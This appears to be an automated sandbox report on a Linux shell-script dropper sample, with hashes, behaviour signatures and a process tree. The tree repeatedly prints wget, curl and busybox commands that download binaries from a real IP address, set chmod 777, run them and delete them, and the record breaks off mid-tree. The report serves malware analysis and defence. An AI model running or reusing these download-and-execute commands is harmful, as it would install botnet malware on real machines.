Analysis
-
max time kernel
30s -
max time network
31s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
01-11-2024 04:36
Static task
static1
Behavioral task
behavioral1
Sample
96ee5037d97be56be07480a9596e28c95b95a91f180aecda5097319fdeec7deb.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
96ee5037d97be56be07480a9596e28c95b95a91f180aecda5097319fdeec7deb.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
96ee5037d97be56be07480a9596e28c95b95a91f180aecda5097319fdeec7deb.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
96ee5037d97be56be07480a9596e28c95b95a91f180aecda5097319fdeec7deb.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
96ee5037d97be56be07480a9596e28c95b95a91f180aecda5097319fdeec7deb.sh
-
Size
10KB
-
MD5
3dd5c19ec5fe98baa364142d535458dd
-
SHA1
07c95352a7b1f0aa31bea494cd8e2e4f6dfab78f
-
SHA256
96ee5037d97be56be07480a9596e28c95b95a91f180aecda5097319fdeec7deb
-
SHA512
81bcbab2896b757cdebbc6b90b866f6a591c375036fd0043391e2b28b69a7d3fdb2471e023cdf9a613e4e8c0ad008231e4089365151a7e6249a8825b5eb7a479
-
SSDEEP
192:sUA5CiAJnvavrYnXpapai2b66+SeKLDsvrYnXZ+i2b66SSe+dUA5CiKnv1:sUA5CiAJnv/apmHRSUA5CiKnv1
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodpid process 744 chmod 798 chmod 836 chmod 842 chmod 916 chmod 695 chmod 719 chmod 755 chmod 828 chmod 884 chmod 681 chmod 810 chmod 848 chmod 904 chmod 804 chmod 866 chmod 910 chmod 925 chmod 816 chmod 822 chmod 860 chmod 872 chmod 890 chmod 778 chmod 792 chmod 878 chmod 854 chmod 897 chmod -
Executes dropped EXE 28 IoCs
Processes:
lFJzR6hmq4a4xs66nSqRhzVp4NUQNjQvcusgAW8gTvfedveDVZi11XW1pkq2gx7igga6ayEjLe8EUWsf2WxbUnokTEdgDycr48pi15jvXtkqJqrtAwhPPfNGwHzNiRtvJ87iVwXoiXadDK3dbQ1QrqOBGDSF4tFq0cNa6IkjYXP0iZEipCOQ5oJiUBcLP8VFbxYUre9htH88zQOmNrbGhysNEKr7LCDzbsx3Cj64jU8kAspbqQQYJjQ7HvBIDBgdh24IyvS6dRYYUPt6Lxr1Fr5hHdL2MS5LFbuqXHd0epxbHIQfKkrov6CYjwcsQYSX8e26NXgWcPZJCw68WNQRSx5R3xNdvpDSZf9yxVZbxW88GxIVrqsQR8wm8EtAvUgm5lSDDLnowje4xppmSa4YYQCiZsYyjSbtmKcFjw87dnIby7cezOe7xjiVeYGqu0emuKlxlcdMlG1VQ7ZjFPxUcVovTp90ayEjLe8EUWsf2WxbUnokTEdgDycr48pi15jvXtkqJqrtAwhPPfNGwHzNiRtvJ87iVwXoiXadDK3dbQ1QrqOBGDSF4tFq0cNa6IkjYXzQOmNrbGhysNEKr7LCDzbsx3Cj64jU8kAspbqQQYJjQ7HvBIDBgdh24IyvS6dRYYUPt6Lxr1Fr5hHdL2MS5LFbuqXHd0epxbHIQfKkrov6CYjwcsQYSX8e26NXgWcPZJCw68WNQRP0iZEipCOQ5oJiUBcLP8VFbxYUre9htH88wm8EtAvUgm5lSDDLnowje4xppmSa4YYQCiZsYyjSbtmKcFjw87dnIby7cezOe7xjiVeYGqu0emuKlxlcdMlG1VQ7ZjFPxUcVovTp90Sx5R3xNdvpDSZf9yxVZbxW88GxIVrqsQR8lFJzR6hmq4a4xs66nSqRhzVp4NUQNjQvcusgAW8gTvfedveDVZi11XW1pkq2gx7igga6ioc pid process /tmp/lFJzR6hmq4a4xs66nSqRhzVp4NUQNjQvcu 682 lFJzR6hmq4a4xs66nSqRhzVp4NUQNjQvcu /tmp/sgAW8gTvfedveDVZi11XW1pkq2gx7igga6 696 sgAW8gTvfedveDVZi11XW1pkq2gx7igga6 /tmp/ayEjLe8EUWsf2WxbUnokTEdgDycr48pi15 720 ayEjLe8EUWsf2WxbUnokTEdgDycr48pi15 /tmp/jvXtkqJqrtAwhPPfNGwHzNiRtvJ87iVwXo 745 jvXtkqJqrtAwhPPfNGwHzNiRtvJ87iVwXo /tmp/iXadDK3dbQ1QrqOBGDSF4tFq0cNa6IkjYX 756 iXadDK3dbQ1QrqOBGDSF4tFq0cNa6IkjYX /tmp/P0iZEipCOQ5oJiUBcLP8VFbxYUre9htH88 780 P0iZEipCOQ5oJiUBcLP8VFbxYUre9htH88 /tmp/zQOmNrbGhysNEKr7LCDzbsx3Cj64jU8kAs 793 zQOmNrbGhysNEKr7LCDzbsx3Cj64jU8kAs /tmp/pbqQQYJjQ7HvBIDBgdh24IyvS6dRYYUPt6 799 pbqQQYJjQ7HvBIDBgdh24IyvS6dRYYUPt6 /tmp/Lxr1Fr5hHdL2MS5LFbuqXHd0epxbHIQfKk 805 Lxr1Fr5hHdL2MS5LFbuqXHd0epxbHIQfKk /tmp/rov6CYjwcsQYSX8e26NXgWcPZJCw68WNQR 811 rov6CYjwcsQYSX8e26NXgWcPZJCw68WNQR /tmp/Sx5R3xNdvpDSZf9yxVZbxW88GxIVrqsQR8 817 Sx5R3xNdvpDSZf9yxVZbxW88GxIVrqsQR8 /tmp/wm8EtAvUgm5lSDDLnowje4xppmSa4YYQCi 823 wm8EtAvUgm5lSDDLnowje4xppmSa4YYQCi /tmp/ZsYyjSbtmKcFjw87dnIby7cezOe7xjiVeY 829 ZsYyjSbtmKcFjw87dnIby7cezOe7xjiVeY /tmp/Gqu0emuKlxlcdMlG1VQ7ZjFPxUcVovTp90 837 Gqu0emuKlxlcdMlG1VQ7ZjFPxUcVovTp90 /tmp/ayEjLe8EUWsf2WxbUnokTEdgDycr48pi15 843 ayEjLe8EUWsf2WxbUnokTEdgDycr48pi15 /tmp/jvXtkqJqrtAwhPPfNGwHzNiRtvJ87iVwXo 849 jvXtkqJqrtAwhPPfNGwHzNiRtvJ87iVwXo /tmp/iXadDK3dbQ1QrqOBGDSF4tFq0cNa6IkjYX 855 iXadDK3dbQ1QrqOBGDSF4tFq0cNa6IkjYX /tmp/zQOmNrbGhysNEKr7LCDzbsx3Cj64jU8kAs 861 zQOmNrbGhysNEKr7LCDzbsx3Cj64jU8kAs /tmp/pbqQQYJjQ7HvBIDBgdh24IyvS6dRYYUPt6 867 pbqQQYJjQ7HvBIDBgdh24IyvS6dRYYUPt6 /tmp/Lxr1Fr5hHdL2MS5LFbuqXHd0epxbHIQfKk 873 Lxr1Fr5hHdL2MS5LFbuqXHd0epxbHIQfKk /tmp/rov6CYjwcsQYSX8e26NXgWcPZJCw68WNQR 879 rov6CYjwcsQYSX8e26NXgWcPZJCw68WNQR /tmp/P0iZEipCOQ5oJiUBcLP8VFbxYUre9htH88 885 P0iZEipCOQ5oJiUBcLP8VFbxYUre9htH88 /tmp/wm8EtAvUgm5lSDDLnowje4xppmSa4YYQCi 891 wm8EtAvUgm5lSDDLnowje4xppmSa4YYQCi /tmp/ZsYyjSbtmKcFjw87dnIby7cezOe7xjiVeY 898 ZsYyjSbtmKcFjw87dnIby7cezOe7xjiVeY /tmp/Gqu0emuKlxlcdMlG1VQ7ZjFPxUcVovTp90 905 Gqu0emuKlxlcdMlG1VQ7ZjFPxUcVovTp90 /tmp/Sx5R3xNdvpDSZf9yxVZbxW88GxIVrqsQR8 911 Sx5R3xNdvpDSZf9yxVZbxW88GxIVrqsQR8 /tmp/lFJzR6hmq4a4xs66nSqRhzVp4NUQNjQvcu 917 lFJzR6hmq4a4xs66nSqRhzVp4NUQNjQvcu /tmp/sgAW8gTvfedveDVZi11XW1pkq2gx7igga6 926 sgAW8gTvfedveDVZi11XW1pkq2gx7igga6 -
Checks CPU configuration 1 TTPs 28 IoCs
Checks CPU information which indicate if the system is a virtual machine.
Processes:
curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurldescription ioc process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
Processes:
curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurldescription ioc process File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 10 IoCs
Adversaries may gather information about the network configuration of a system.
Processes:
wgetP0iZEipCOQ5oJiUBcLP8VFbxYUre9htH88P0iZEipCOQ5oJiUBcLP8VFbxYUre9htH88rmcurlbusyboxrmwgetcurlbusyboxpid process 759 wget 780 P0iZEipCOQ5oJiUBcLP8VFbxYUre9htH88 885 P0iZEipCOQ5oJiUBcLP8VFbxYUre9htH88 886 rm 765 curl 772 busybox 781 rm 881 wget 882 curl 883 busybox -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes:
curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurldescription ioc process File opened for modification /tmp/ayEjLe8EUWsf2WxbUnokTEdgDycr48pi15 curl File opened for modification /tmp/Gqu0emuKlxlcdMlG1VQ7ZjFPxUcVovTp90 curl File opened for modification /tmp/rov6CYjwcsQYSX8e26NXgWcPZJCw68WNQR curl File opened for modification /tmp/lFJzR6hmq4a4xs66nSqRhzVp4NUQNjQvcu curl File opened for modification /tmp/Lxr1Fr5hHdL2MS5LFbuqXHd0epxbHIQfKk curl File opened for modification /tmp/pbqQQYJjQ7HvBIDBgdh24IyvS6dRYYUPt6 curl File opened for modification /tmp/Sx5R3xNdvpDSZf9yxVZbxW88GxIVrqsQR8 curl File opened for modification /tmp/lFJzR6hmq4a4xs66nSqRhzVp4NUQNjQvcu curl File opened for modification /tmp/zQOmNrbGhysNEKr7LCDzbsx3Cj64jU8kAs curl File opened for modification /tmp/Lxr1Fr5hHdL2MS5LFbuqXHd0epxbHIQfKk curl File opened for modification /tmp/ayEjLe8EUWsf2WxbUnokTEdgDycr48pi15 curl File opened for modification /tmp/wm8EtAvUgm5lSDDLnowje4xppmSa4YYQCi curl File opened for modification /tmp/ZsYyjSbtmKcFjw87dnIby7cezOe7xjiVeY curl File opened for modification /tmp/ZsYyjSbtmKcFjw87dnIby7cezOe7xjiVeY curl File opened for modification /tmp/P0iZEipCOQ5oJiUBcLP8VFbxYUre9htH88 curl File opened for modification /tmp/pbqQQYJjQ7HvBIDBgdh24IyvS6dRYYUPt6 curl File opened for modification /tmp/wm8EtAvUgm5lSDDLnowje4xppmSa4YYQCi curl File opened for modification /tmp/iXadDK3dbQ1QrqOBGDSF4tFq0cNa6IkjYX curl File opened for modification /tmp/P0iZEipCOQ5oJiUBcLP8VFbxYUre9htH88 curl File opened for modification /tmp/sgAW8gTvfedveDVZi11XW1pkq2gx7igga6 curl File opened for modification /tmp/sgAW8gTvfedveDVZi11XW1pkq2gx7igga6 curl File opened for modification /tmp/jvXtkqJqrtAwhPPfNGwHzNiRtvJ87iVwXo curl File opened for modification /tmp/iXadDK3dbQ1QrqOBGDSF4tFq0cNa6IkjYX curl File opened for modification /tmp/zQOmNrbGhysNEKr7LCDzbsx3Cj64jU8kAs curl File opened for modification /tmp/Gqu0emuKlxlcdMlG1VQ7ZjFPxUcVovTp90 curl File opened for modification /tmp/rov6CYjwcsQYSX8e26NXgWcPZJCw68WNQR curl File opened for modification /tmp/Sx5R3xNdvpDSZf9yxVZbxW88GxIVrqsQR8 curl File opened for modification /tmp/jvXtkqJqrtAwhPPfNGwHzNiRtvJ87iVwXo curl
Processes
-
/tmp/96ee5037d97be56be07480a9596e28c95b95a91f180aecda5097319fdeec7deb.sh/tmp/96ee5037d97be56be07480a9596e28c95b95a91f180aecda5097319fdeec7deb.sh1⤵PID:647
-
/bin/rm/bin/rm bins.sh2⤵PID:649
-
/usr/bin/wgetwget http://87.120.84.230/bins/lFJzR6hmq4a4xs66nSqRhzVp4NUQNjQvcu2⤵PID:652
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/lFJzR6hmq4a4xs66nSqRhzVp4NUQNjQvcu2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:672 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/lFJzR6hmq4a4xs66nSqRhzVp4NUQNjQvcu2⤵PID:679
-
/bin/chmodchmod 777 lFJzR6hmq4a4xs66nSqRhzVp4NUQNjQvcu2⤵
- File and Directory Permissions Modification
PID:681 -
/tmp/lFJzR6hmq4a4xs66nSqRhzVp4NUQNjQvcu./lFJzR6hmq4a4xs66nSqRhzVp4NUQNjQvcu2⤵
- Executes dropped EXE
PID:682 -
/bin/rmrm lFJzR6hmq4a4xs66nSqRhzVp4NUQNjQvcu2⤵PID:683
-
/usr/bin/wgetwget http://87.120.84.230/bins/sgAW8gTvfedveDVZi11XW1pkq2gx7igga62⤵PID:684
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/sgAW8gTvfedveDVZi11XW1pkq2gx7igga62⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:685 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/sgAW8gTvfedveDVZi11XW1pkq2gx7igga62⤵PID:690
-
/bin/chmodchmod 777 sgAW8gTvfedveDVZi11XW1pkq2gx7igga62⤵
- File and Directory Permissions Modification
PID:695 -
/tmp/sgAW8gTvfedveDVZi11XW1pkq2gx7igga6./sgAW8gTvfedveDVZi11XW1pkq2gx7igga62⤵
- Executes dropped EXE
PID:696 -
/bin/rmrm sgAW8gTvfedveDVZi11XW1pkq2gx7igga62⤵PID:697
-
/usr/bin/wgetwget http://87.120.84.230/bins/ayEjLe8EUWsf2WxbUnokTEdgDycr48pi152⤵PID:699
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/ayEjLe8EUWsf2WxbUnokTEdgDycr48pi152⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:707 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/ayEjLe8EUWsf2WxbUnokTEdgDycr48pi152⤵PID:714
-
/bin/chmodchmod 777 ayEjLe8EUWsf2WxbUnokTEdgDycr48pi152⤵
- File and Directory Permissions Modification
PID:719 -
/tmp/ayEjLe8EUWsf2WxbUnokTEdgDycr48pi15./ayEjLe8EUWsf2WxbUnokTEdgDycr48pi152⤵
- Executes dropped EXE
PID:720 -
/bin/rmrm ayEjLe8EUWsf2WxbUnokTEdgDycr48pi152⤵PID:721
-
/usr/bin/wgetwget http://87.120.84.230/bins/jvXtkqJqrtAwhPPfNGwHzNiRtvJ87iVwXo2⤵PID:723
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/jvXtkqJqrtAwhPPfNGwHzNiRtvJ87iVwXo2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:730 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/jvXtkqJqrtAwhPPfNGwHzNiRtvJ87iVwXo2⤵PID:739
-
/bin/chmodchmod 777 jvXtkqJqrtAwhPPfNGwHzNiRtvJ87iVwXo2⤵
- File and Directory Permissions Modification
PID:744 -
/tmp/jvXtkqJqrtAwhPPfNGwHzNiRtvJ87iVwXo./jvXtkqJqrtAwhPPfNGwHzNiRtvJ87iVwXo2⤵
- Executes dropped EXE
PID:745 -
/bin/rmrm jvXtkqJqrtAwhPPfNGwHzNiRtvJ87iVwXo2⤵PID:746
-
/usr/bin/wgetwget http://87.120.84.230/bins/iXadDK3dbQ1QrqOBGDSF4tFq0cNa6IkjYX2⤵PID:747
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/iXadDK3dbQ1QrqOBGDSF4tFq0cNa6IkjYX2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:748 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/iXadDK3dbQ1QrqOBGDSF4tFq0cNa6IkjYX2⤵PID:749
-
/bin/chmodchmod 777 iXadDK3dbQ1QrqOBGDSF4tFq0cNa6IkjYX2⤵
- File and Directory Permissions Modification
PID:755 -
/tmp/iXadDK3dbQ1QrqOBGDSF4tFq0cNa6IkjYX./iXadDK3dbQ1QrqOBGDSF4tFq0cNa6IkjYX2⤵
- Executes dropped EXE
PID:756 -
/bin/rmrm iXadDK3dbQ1QrqOBGDSF4tFq0cNa6IkjYX2⤵PID:757
-
/usr/bin/wgetwget http://87.120.84.230/bins/P0iZEipCOQ5oJiUBcLP8VFbxYUre9htH882⤵
- System Network Configuration Discovery
PID:759 -
/usr/bin/curlcurl -O http://87.120.84.230/bins/P0iZEipCOQ5oJiUBcLP8VFbxYUre9htH882⤵
- Checks CPU configuration
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:765 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/P0iZEipCOQ5oJiUBcLP8VFbxYUre9htH882⤵
- System Network Configuration Discovery
PID:772 -
/bin/chmodchmod 777 P0iZEipCOQ5oJiUBcLP8VFbxYUre9htH882⤵
- File and Directory Permissions Modification
PID:778 -
/tmp/P0iZEipCOQ5oJiUBcLP8VFbxYUre9htH88./P0iZEipCOQ5oJiUBcLP8VFbxYUre9htH882⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:780 -
/bin/rmrm P0iZEipCOQ5oJiUBcLP8VFbxYUre9htH882⤵
- System Network Configuration Discovery
PID:781 -
/usr/bin/wgetwget http://87.120.84.230/bins/zQOmNrbGhysNEKr7LCDzbsx3Cj64jU8kAs2⤵PID:783
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/zQOmNrbGhysNEKr7LCDzbsx3Cj64jU8kAs2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:789 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/zQOmNrbGhysNEKr7LCDzbsx3Cj64jU8kAs2⤵PID:791
-
/bin/chmodchmod 777 zQOmNrbGhysNEKr7LCDzbsx3Cj64jU8kAs2⤵
- File and Directory Permissions Modification
PID:792 -
/tmp/zQOmNrbGhysNEKr7LCDzbsx3Cj64jU8kAs./zQOmNrbGhysNEKr7LCDzbsx3Cj64jU8kAs2⤵
- Executes dropped EXE
PID:793 -
/bin/rmrm zQOmNrbGhysNEKr7LCDzbsx3Cj64jU8kAs2⤵PID:794
-
/usr/bin/wgetwget http://87.120.84.230/bins/pbqQQYJjQ7HvBIDBgdh24IyvS6dRYYUPt62⤵PID:795
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/pbqQQYJjQ7HvBIDBgdh24IyvS6dRYYUPt62⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:796 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/pbqQQYJjQ7HvBIDBgdh24IyvS6dRYYUPt62⤵PID:797
-
/bin/chmodchmod 777 pbqQQYJjQ7HvBIDBgdh24IyvS6dRYYUPt62⤵
- File and Directory Permissions Modification
PID:798 -
/tmp/pbqQQYJjQ7HvBIDBgdh24IyvS6dRYYUPt6./pbqQQYJjQ7HvBIDBgdh24IyvS6dRYYUPt62⤵
- Executes dropped EXE
PID:799 -
/bin/rmrm pbqQQYJjQ7HvBIDBgdh24IyvS6dRYYUPt62⤵PID:800
-
/usr/bin/wgetwget http://87.120.84.230/bins/Lxr1Fr5hHdL2MS5LFbuqXHd0epxbHIQfKk2⤵PID:801
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Lxr1Fr5hHdL2MS5LFbuqXHd0epxbHIQfKk2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:802 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Lxr1Fr5hHdL2MS5LFbuqXHd0epxbHIQfKk2⤵PID:803
-
/bin/chmodchmod 777 Lxr1Fr5hHdL2MS5LFbuqXHd0epxbHIQfKk2⤵
- File and Directory Permissions Modification
PID:804 -
/tmp/Lxr1Fr5hHdL2MS5LFbuqXHd0epxbHIQfKk./Lxr1Fr5hHdL2MS5LFbuqXHd0epxbHIQfKk2⤵
- Executes dropped EXE
PID:805 -
/bin/rmrm Lxr1Fr5hHdL2MS5LFbuqXHd0epxbHIQfKk2⤵PID:806
-
/usr/bin/wgetwget http://87.120.84.230/bins/rov6CYjwcsQYSX8e26NXgWcPZJCw68WNQR2⤵PID:807
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/rov6CYjwcsQYSX8e26NXgWcPZJCw68WNQR2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:808 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/rov6CYjwcsQYSX8e26NXgWcPZJCw68WNQR2⤵PID:809
-
/bin/chmodchmod 777 rov6CYjwcsQYSX8e26NXgWcPZJCw68WNQR2⤵
- File and Directory Permissions Modification
PID:810 -
/tmp/rov6CYjwcsQYSX8e26NXgWcPZJCw68WNQR./rov6CYjwcsQYSX8e26NXgWcPZJCw68WNQR2⤵
- Executes dropped EXE
PID:811 -
/bin/rmrm rov6CYjwcsQYSX8e26NXgWcPZJCw68WNQR2⤵PID:812
-
/usr/bin/wgetwget http://87.120.84.230/bins/Sx5R3xNdvpDSZf9yxVZbxW88GxIVrqsQR82⤵PID:813
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Sx5R3xNdvpDSZf9yxVZbxW88GxIVrqsQR82⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:814 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Sx5R3xNdvpDSZf9yxVZbxW88GxIVrqsQR82⤵PID:815
-
/bin/chmodchmod 777 Sx5R3xNdvpDSZf9yxVZbxW88GxIVrqsQR82⤵
- File and Directory Permissions Modification
PID:816 -
/tmp/Sx5R3xNdvpDSZf9yxVZbxW88GxIVrqsQR8./Sx5R3xNdvpDSZf9yxVZbxW88GxIVrqsQR82⤵
- Executes dropped EXE
PID:817 -
/bin/rmrm Sx5R3xNdvpDSZf9yxVZbxW88GxIVrqsQR82⤵PID:818
-
/usr/bin/wgetwget http://87.120.84.230/bins/wm8EtAvUgm5lSDDLnowje4xppmSa4YYQCi2⤵PID:819
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/wm8EtAvUgm5lSDDLnowje4xppmSa4YYQCi2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:820 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/wm8EtAvUgm5lSDDLnowje4xppmSa4YYQCi2⤵PID:821
-
/bin/chmodchmod 777 wm8EtAvUgm5lSDDLnowje4xppmSa4YYQCi2⤵
- File and Directory Permissions Modification
PID:822 -
/tmp/wm8EtAvUgm5lSDDLnowje4xppmSa4YYQCi./wm8EtAvUgm5lSDDLnowje4xppmSa4YYQCi2⤵
- Executes dropped EXE
PID:823 -
/bin/rmrm wm8EtAvUgm5lSDDLnowje4xppmSa4YYQCi2⤵PID:824
-
/usr/bin/wgetwget http://87.120.84.230/bins/ZsYyjSbtmKcFjw87dnIby7cezOe7xjiVeY2⤵PID:825
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/ZsYyjSbtmKcFjw87dnIby7cezOe7xjiVeY2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:826 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/ZsYyjSbtmKcFjw87dnIby7cezOe7xjiVeY2⤵PID:827
-
/bin/chmodchmod 777 ZsYyjSbtmKcFjw87dnIby7cezOe7xjiVeY2⤵
- File and Directory Permissions Modification
PID:828 -
/tmp/ZsYyjSbtmKcFjw87dnIby7cezOe7xjiVeY./ZsYyjSbtmKcFjw87dnIby7cezOe7xjiVeY2⤵
- Executes dropped EXE
PID:829 -
/bin/rmrm ZsYyjSbtmKcFjw87dnIby7cezOe7xjiVeY2⤵PID:830
-
/usr/bin/wgetwget http://87.120.84.230/bins/Gqu0emuKlxlcdMlG1VQ7ZjFPxUcVovTp902⤵PID:831
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Gqu0emuKlxlcdMlG1VQ7ZjFPxUcVovTp902⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:832 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Gqu0emuKlxlcdMlG1VQ7ZjFPxUcVovTp902⤵PID:835
-
/bin/chmodchmod 777 Gqu0emuKlxlcdMlG1VQ7ZjFPxUcVovTp902⤵
- File and Directory Permissions Modification
PID:836 -
/tmp/Gqu0emuKlxlcdMlG1VQ7ZjFPxUcVovTp90./Gqu0emuKlxlcdMlG1VQ7ZjFPxUcVovTp902⤵
- Executes dropped EXE
PID:837 -
/bin/rmrm Gqu0emuKlxlcdMlG1VQ7ZjFPxUcVovTp902⤵PID:838
-
/usr/bin/wgetwget http://87.120.84.230/bins/ayEjLe8EUWsf2WxbUnokTEdgDycr48pi152⤵PID:839
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/ayEjLe8EUWsf2WxbUnokTEdgDycr48pi152⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:840 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/ayEjLe8EUWsf2WxbUnokTEdgDycr48pi152⤵PID:841
-
/bin/chmodchmod 777 ayEjLe8EUWsf2WxbUnokTEdgDycr48pi152⤵
- File and Directory Permissions Modification
PID:842 -
/tmp/ayEjLe8EUWsf2WxbUnokTEdgDycr48pi15./ayEjLe8EUWsf2WxbUnokTEdgDycr48pi152⤵
- Executes dropped EXE
PID:843 -
/bin/rmrm ayEjLe8EUWsf2WxbUnokTEdgDycr48pi152⤵PID:844
-
/usr/bin/wgetwget http://87.120.84.230/bins/jvXtkqJqrtAwhPPfNGwHzNiRtvJ87iVwXo2⤵PID:845
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/jvXtkqJqrtAwhPPfNGwHzNiRtvJ87iVwXo2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:846 -
